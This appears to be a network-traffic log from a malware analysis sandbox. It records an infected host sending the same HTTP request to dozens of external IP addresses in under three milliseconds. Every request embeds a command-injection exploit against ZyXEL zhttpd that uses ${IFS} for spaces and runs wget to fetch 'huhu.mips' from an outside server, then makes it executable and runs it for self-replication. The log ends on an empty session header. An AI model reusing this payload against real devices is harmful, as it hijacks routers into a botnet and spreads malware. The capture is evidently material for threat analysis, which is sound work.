                                                Jan 29, 2024 07:07:35.047261000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1016192.168.2.234088490.219.174.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047295094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1017192.168.2.2334358156.200.168.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047342062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1018192.168.2.2348046205.213.89.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047386885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1019192.168.2.2336082153.198.60.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047415018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1020192.168.2.2341824134.243.44.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047441006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1021192.168.2.2350862102.114.125.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047482014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1022192.168.2.2359174134.249.136.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047539949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1023192.168.2.2356650161.128.155.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047568083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1024192.168.2.2355560212.74.102.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047583103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1025192.168.2.2359800167.40.82.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047686100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1026192.168.2.2358242175.223.73.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047712088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1027192.168.2.2338000146.234.127.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047754049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1028192.168.2.235645220.6.80.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047774076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1029192.168.2.236042466.129.58.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047808886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1030192.168.2.233935850.132.176.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047844887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1031192.168.2.2345862203.235.168.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047919035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1032192.168.2.235641612.55.45.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047939062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1033192.168.2.2338204167.234.232.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047975063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1034192.168.2.2338276157.141.216.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048000097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1035192.168.2.235056653.60.85.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048032045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1036192.168.2.2332838111.158.210.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048103094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1037192.168.2.2339014168.14.62.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048106909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1038192.168.2.2343930173.98.29.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048142910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1039192.168.2.233327240.245.130.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048181057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1040192.168.2.2333146143.82.35.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048219919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1041192.168.2.234779888.232.252.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048259020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1042192.168.2.2348260220.26.240.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048325062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1043192.168.2.233836292.218.35.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048352957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1044192.168.2.234939273.53.209.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048388004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1045192.168.2.2359400147.111.128.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048434973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1046192.168.2.234654642.94.85.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048455000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1047192.168.2.2333062211.220.203.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048523903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1048192.168.2.2341724164.219.78.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048557043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1049192.168.2.234988239.44.121.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048614979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1050192.168.2.235022431.235.70.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048640013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1051192.168.2.2340416110.52.241.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048672915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1052192.168.2.2343658102.155.173.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048716068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1053192.168.2.234285866.19.129.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048770905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1054192.168.2.2342770216.235.55.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048804998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1055192.168.2.2343504157.205.124.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048835039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1056192.168.2.2358424112.163.0.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048871040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1057192.168.2.235871461.68.48.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048926115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1058192.168.2.2339662196.45.64.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048960924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1059192.168.2.2341454197.168.209.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.048996925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1060192.168.2.2351578155.125.78.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049047947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1061192.168.2.2351032152.219.232.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049076080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1062192.168.2.233341249.65.162.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049134970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1063192.168.2.2344174138.66.131.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049170971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1064192.168.2.235287845.77.149.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049186945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1065192.168.2.236036224.42.112.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049217939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1066192.168.2.234838220.103.110.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049309969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1067192.168.2.2357096133.93.4.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049370050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1068192.168.2.2340938144.103.192.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049401045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1069192.168.2.235764068.22.226.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049434900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1070192.168.2.235418813.145.224.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049472094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1071192.168.2.235628448.118.236.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049499035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1072192.168.2.235842061.91.233.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049527884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1073192.168.2.235426887.177.134.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049551964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1074192.168.2.2333802130.14.131.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049587011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1075192.168.2.234391659.192.185.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049635887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1076192.168.2.2350868176.17.3.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049675941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1077192.168.2.236022227.241.190.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049711943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1078192.168.2.2335242148.1.167.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.049731970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1079192.168.2.2350140220.2.201.11443
                                                TimestampBytes transferredDirectionData
